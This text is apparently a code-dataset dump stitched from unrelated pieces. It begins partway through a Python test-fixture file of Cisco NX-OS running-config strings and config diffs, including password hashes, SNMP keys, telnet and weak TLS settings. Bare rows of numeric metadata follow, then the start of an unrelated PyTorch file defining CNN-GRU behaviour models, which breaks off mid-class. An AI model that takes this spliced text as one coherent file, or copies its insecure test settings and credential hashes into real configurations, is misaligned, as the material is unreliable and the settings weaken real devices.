"\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:56 2019\n!Time: Wed Dec 4 15:33:56 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname n9k-device\ninstall feature-set fex\nvdc n9k-device id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 192.168.0.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 192.168.0.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n"
]
config_input_file = """
feature bgp
!
router bgp 55
address-family ipv4 unicast
no client-to-client reflection
additional-paths send
"""
template_engine_file_str_file = config_input_file
config_result_file = [
[
"feature bgp",
"!",
"router bgp 55",
" address-family ipv4 unicast",
" no client-to-client reflection",
" additional-paths send",
],
[{}, {}, {}, {}, {}, {}],
]
initial_config_file = [
"\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:33:56 2019\n!Time: Wed Dec 4 15:55:51 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname dt-n9k5-1\ninstall feature-set fex\nvdc dt-n9k5-1 id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 10.122.197.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 10.122.197.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n"
]
modified_config_file = [
"\n!Command: show running-config\n!Running configuration last done at: Wed Dec 4 15:55:55 2019\n!Time: Wed Dec 4 15:55:55 2019\n\nversion 9.2(4) Bios:version 07.66 \nhostname dt-n9k5-1\ninstall feature-set fex\nvdc dt-n9k5-1 id 1\n allow feature-set fex\n limit-resource vlan minimum 16 maximum 4094\n limit-resource vrf minimum 2 maximum 4096\n limit-resource port-channel minimum 0 maximum 256\n limit-resource u4route-mem minimum 248 maximum 248\n limit-resource u6route-mem minimum 96 maximum 96\n limit-resource m4route-mem minimum 58 maximum 58\n limit-resource m6route-mem minimum 8 maximum 8\nfeature-set fex\n\nfeature privilege\nfeature telnet\nfeature nxapi\nfeature bash-shell\ncfs eth distribute\nfeature ngmvpn\nfeature bgp\nfeature pim\nfeature lldp\n\nusername admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin\nusername devops_user password 5 ! role network-operator\nusername devops_user passphrase lifetime 99999 warntime 14 gracetime 3\nusername salt_test password 5 $5$mkXh6O4T$YUVtA89HbXCnue63kgghPlaqPHyaXhdtxPBbPEHhbRC role network-operator\nusername salt_test passphrase lifetime 99999 warntime 14 gracetime 3\nip domain-lookup\nip name-server 1.1.1.1 2.2.2.2\nno system default switchport\nsystem default switchport shutdown\nno logging event link-status default\nno logging event link-status enable\nno logging event trunk-status enable\ntime-range ans-range\ntime-range my_range\ncopp profile strict\nsnmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey\nsnmp-server user devops_user network-operator \nsnmp-server user salt_test network-operator auth md5 0x3a16a4d0a569be282cc5fbc96138fac8 priv 0x3a16a4d0a569be282cc5fbc96138fac8 localizedkey\nrmon event 1 description FATAL(1) owner PMON@FATAL\nrmon event 2 description CRITICAL(2) owner PMON@CRITICAL\nrmon event 3 description ERROR(3) owner PMON@ERROR\nrmon event 4 description WARNING(4) owner PMON@WARNING\nrmon event 5 description INFORMATION(5) owner PMON@INFO\nno snmp-server enable traps entity entity_mib_change\nno snmp-server enable traps entity entity_module_status_change\nno snmp-server enable traps entity entity_power_status_change\nno snmp-server enable traps entity entity_module_inserted\nno snmp-server enable traps entity entity_module_removed\nno snmp-server enable traps entity entity_unrecognised_module\nno snmp-server enable traps entity entity_fan_status_change\nno snmp-server enable traps entity entity_power_out_change\nno snmp-server enable traps link linkDown\nno snmp-server enable traps link linkUp\nno snmp-server enable traps link extended-linkDown\nno snmp-server enable traps link extended-linkUp\nno snmp-server enable traps link cieLinkDown\nno snmp-server enable traps link cieLinkUp\nno snmp-server enable traps link delayed-link-state-change\nno snmp-server enable traps rf redundancy_framework\nno snmp-server enable traps license notify-license-expiry\nno snmp-server enable traps license notify-no-license-for-feature\nno snmp-server enable traps license notify-licensefile-missing\nno snmp-server enable traps license notify-license-expiry-warning\nno snmp-server enable traps upgrade UpgradeOpNotifyOnCompletion\nno snmp-server enable traps upgrade UpgradeJobStatusNotify\nno snmp-server enable traps rmon risingAlarm\nno snmp-server enable traps rmon fallingAlarm\nno snmp-server enable traps rmon hcRisingAlarm\nno snmp-server enable traps rmon hcFallingAlarm\nno snmp-server enable traps entity entity_sensor\nno snmp-server enable traps entity cefcMIBEnableStatusNotification\nno snmp-server enable traps generic coldStart\nno snmp-server enable traps generic warmStart\nno snmp-server enable traps storm-control cpscEventRev1\nno snmp-server enable traps link cErrDisableInterfaceEventRev1\nno snmp-server enable traps link cmn-mac-move-notification\nntp server 10.81.254.202 use-vrf management\n\nip pim ssm range none\nvlan 1\n\nvrf context management\n ip route 0.0.0.0/0 10.122.197.1\nvrf context myvrf\nvrf context testing\nnxapi http port 80\nno nxapi https\nnxapi ssl ciphers weak\nnxapi ssl protocols TLSv1 \n\n\ninterface port-channel19\n\ninterface port-channel42\n\ninterface port-channel55\n\ninterface port-channel66\n\ninterface Ethernet1/1\n\ninterface Ethernet1/2\n\ninterface Ethernet1/3\n no shutdown\n\ninterface Ethernet1/4\n\ninterface Ethernet1/5\n\ninterface Ethernet1/6\n\ninterface Ethernet1/7\n\ninterface Ethernet1/8\n\ninterface Ethernet1/9\n\ninterface Ethernet1/10\n\ninterface Ethernet1/11\n\ninterface Ethernet1/12\n\ninterface Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 10.122.197.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \nrouter bgp 55\n address-family ipv4 unicast\n no client-to-client reflection\n additional-paths send\n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n"
]
delete_config = """
COMMAND_LIST: no feature bgp
---
+++
@@ -19,7 +19,6 @@
feature bash-shell
cfs eth distribute
feature ngmvpn
-feature bgp
feature pim
feature lldp
@@ -234,10 +233,6 @@
line console
line vty
boot nxos bootflash:/nxos.9.2.4.bin
-router bgp 55
- address-family ipv4 unicast
- no client-to-client reflection
- additional-paths send
no logging logfile
no logging monitor
"""
remove_user = """
COMMAND_LIST: no username salt_test
---
+++
@@ -25,8 +25,6 @@
username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin
username devops_user password 5 ! role network-operator
username devops_user passphrase lifetime 99999 warntime 14 gracetime 3
-username salt_test password 5 $5$k8DulS4J$GGvG0RPTZdjklgJ4o6X25/AGpEHw1p1Dz8lI0.J77y3 role network-operator
-username salt_test passphrase lifetime 99999 warntime 14 gracetime 3
ip domain-lookup
ip name-server 1.1.1.1 2.2.2.2
no system default switchport
@@ -39,7 +37,6 @@
copp profile strict
snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey
snmp-server user devops_user network-operator
-snmp-server user salt_test network-operator auth md5 0x6a4237693d3e515b67264a7872476132 priv 0x6a4237693d3e515b67264a7872476132 localizedkey
rmon event 1 description FATAL(1) owner PMON@FATAL
rmon event 2 description CRITICAL(2) owner PMON@CRITICAL
rmon event 3 description ERROR(3) owner PMON@ERROR
"""
save_running_config = """
COMMAND_LIST: copy running-config startup-config
[# ] 1%
[# ] 2%
[## ] 3%
[## ] 4%
[### ] 5%
[### ] 6%
[### ] 7%
[#### ] 8%
[#### ] 9%
[##### ] 10%
[##### ] 11%
[##### ] 12%
[###### ] 13%
[###### ] 14%
[####### ] 15%
[####### ] 16%
[####### ] 17%
[######## ] 18%
[######## ] 19%
[######### ] 20%
[######### ] 21%
[######### ] 22%
[########## ] 23%
[########## ] 24%
[########### ] 25%
[########### ] 26%
[########### ] 27%
[############ ] 28%
[############ ] 29%
[############# ] 30%
[############# ] 31%
[############# ] 32%
[############## ] 33%
[############## ] 34%
[############### ] 35%
[############### ] 36%
[############### ] 37%
[################ ] 38%
[################ ] 39%
[################# ] 40%
[################# ] 41%
[################# ] 42%
[################## ] 43%
[################## ] 44%
[################### ] 45%
[################### ] 46%
[################### ] 47%
[#################### ] 48%
[##################### ] 50%
[##################### ] 51%
[##################### ] 52%
[###################### ] 53%
[###################### ] 54%
[####################### ] 55%
[####################### ] 56%
[####################### ] 57%
[######################## ] 58%
[######################## ] 59%
[######################### ] 60%
[######################### ] 61%
[######################### ] 62%
[########################## ] 63%
[########################## ] 64%
[########################### ] 65%
[########################### ] 66%
[########################### ] 67%
[############################ ] 68%
[############################ ] 69%
[############################# ] 70%
[############################# ] 71%
[############################# ] 72%
[############################## ] 73%
[############################## ] 74%
[############################### ] 75%
[############################### ] 76%
[############################### ] 77%
[################################ ] 78%
[################################ ] 79%
[################################# ] 80%
[################################# ] 81%
[################################# ] 82%
[################################## ] 83%
[################################## ] 84%
[################################### ] 85%
[################################### ] 86%
[################################### ] 87%
[#################################### ] 88%
[#################################### ] 89%
[##################################### ] 90%
[##################################### ] 91%
[##################################### ] 92%
[###################################### ] 93%
[###################################### ] 94%
[####################################### ] 95%
[####################################### ] 96%
[####################################### ] 97%
[########################################] 98%
[########################################] 100%
Copy complete, now saving to disk (please wait)...
Copy complete.
"""
set_role = """
COMMAND_LIST: username salt_test role vdc-admin
warning: password for user:salt_test not set. S/he may not be able to login
---
+++
@@ -26,6 +26,8 @@
username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin
username devops_user password 5 ! role network-operator
username devops_user passphrase lifetime 99999 warntime 14 gracetime 3
+username salt_test password 5 ! role vdc-admin
+username salt_test passphrase lifetime 99999 warntime 14 gracetime 3
ip domain-lookup
ip name-server 1.1.1.1 2.2.2.2
no system default switchport
@@ -38,6 +40,7 @@
copp profile strict
snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey
snmp-server user devops_user network-operator
+snmp-server user salt_test vdc-admin
rmon event 1 description FATAL(1) owner PMON@FATAL
rmon event 2 description CRITICAL(2) owner PMON@CRITICAL
rmon event 3 description ERROR(3) owner PMON@ERROR
"""
unset_role = """
COMMAND_LIST: no username salt_test role vdc-admin
---
+++
@@ -26,8 +26,7 @@
username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin
username ansible password 5 ! role network-operator
username ansible passphrase lifetime 99999 warntime 14 gracetime 3
-username salt_test password 5 ! role vdc-admin
-username salt_test role network-operator
+username salt_test password 5 ! role network-operator
username salt_test passphrase lifetime 99999 warntime 14 gracetime 3
ip domain-lookup
ip name-server 1.1.1.1 2.2.2.2
@@ -41,8 +40,7 @@
copp profile strict
snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey
snmp-server user ansible network-operator
-snmp-server user salt_test vdc-admin
-snmp-server user salt_test network-operator
+snmp-server user salt_test network-operator
rmon event 1 description FATAL(1) owner PMON@FATAL
rmon event 2 description CRITICAL(2) owner PMON@CRITICAL
rmon event 3 description ERROR(3) owner PMON@ERROR
"""
| 134.825397
| 6,290
| 0.719626
| 4,593
| 33,976
| 5.286305
| 0.082081
| 0.121417
| 0.158155
| 0.103295
| 0.960091
| 0.958979
| 0.951647
| 0.949794
| 0.947446
| 0.942504
| 0
| 0.07918
| 0.145426
| 33,976
| 251
| 6,291
| 135.36255
| 0.757052
| 0.000618
| 0
| 0.200873
| 0
| 0.017467
| 0.984508
| 0.371101
| 0
| 0
| 0.024033
| 0
| 0
| 1
| 0
| false
| 0.091703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
936c12de11bd451bfdff49fd7103d0bddb25ce2d
| 8,311
|
py
|
Python
|
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
|
haoqi/emotions_as_primitives_towards_behavior_understanding
|
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
|
[
"0BSD"
] | 2
|
2020-08-13T18:26:46.000Z
|
2021-04-07T18:58:48.000Z
|
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
|
haoqi/emotions_as_primitives_towards_behavior_understanding
|
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
|
[
"0BSD"
] | null | null | null |
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
|
haoqi/emotions_as_primitives_towards_behavior_understanding
|
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 10 16:00:42 2019
@author: haoqi
"""
import torch
import torch.nn as nn
import pdb
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# the model is based on CMU emotion
# Base_1D_NN_fixed_seq_len_1s_majvote_v2
#---------------------------------------------------------------------------------------------------
# GRU seq models
#---------------------------------------------------------------------------------------------------
class model_cnn_seq_CMU_pretrained_N1(nn.Module):
def __init__(self, in_channels_num):
super(model_cnn_seq_CMU_pretrained_N1, self).__init__()
self.cnn_1d=nn.Sequential(
nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46
nn.ReLU()
)
self.cnn_1d_part2=nn.Sequential(
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9
nn.ReLU(),
nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4
nn.ReLU(),
nn.AdaptiveMaxPool1d(1)
)
self.num_of_behs = 5
self.hidden_sz = 128
self.num_layers = 2
self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers)
self.fc_out = nn.Sequential(
nn.Linear(self.hidden_sz, int(self.hidden_sz/2)),
nn.ReLU(),
nn.Linear(int(self.hidden_sz/2), self.num_of_behs)
)
def forward(self, x_input):
x_cnn_output1 = self.cnn_1d(x_input)
x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1)
x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128)
x_input_to_seq = torch.unsqueeze(x, 1)
# change to the input of seq model (seq_len, batch, input_size):
batch_sz = x_input_to_seq.shape[1]
h_init = self.initHidden(batch_sz)
x, hidden = self.gru1(x_input_to_seq , h_init)
x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem
return x_ouput
def initHidden(self, batch_sz):
return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device)
class model_cnn_seq_CMU_pretrained_N2(nn.Module):
def __init__(self, in_channels_num):
super(model_cnn_seq_CMU_pretrained_N2, self).__init__()
self.cnn_1d=nn.Sequential(
nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21
nn.ReLU(),
nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9
nn.ReLU()
)
self.cnn_1d_part2=nn.Sequential(
nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4
nn.ReLU(),
nn.AdaptiveMaxPool1d(1)
)
self.num_of_behs = 5
self.hidden_sz = 128
self.num_layers = 2
self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers)
self.fc_out = nn.Sequential(
nn.Linear(self.hidden_sz, int(self.hidden_sz/2)),
nn.ReLU(),
nn.Linear(int(self.hidden_sz/2), self.num_of_behs)
)
def forward(self, x_input):
x_cnn_output1 = self.cnn_1d(x_input)
x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1)
x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128)
x_input_to_seq = torch.unsqueeze(x, 1)
# change to the input of seq model (seq_len, batch, input_size):
batch_sz = x_input_to_seq.shape[1]
h_init = self.initHidden(batch_sz)
x, hidden = self.gru1(x_input_to_seq , h_init)
x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem
return x_ouput
def initHidden(self, batch_sz):
return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device)
class model_cnn_seq_CMU_pretrained_N3(nn.Module):
def __init__(self, in_channels_num):
super(model_cnn_seq_CMU_pretrained_N3, self).__init__()
self.cnn_1d=nn.Sequential(
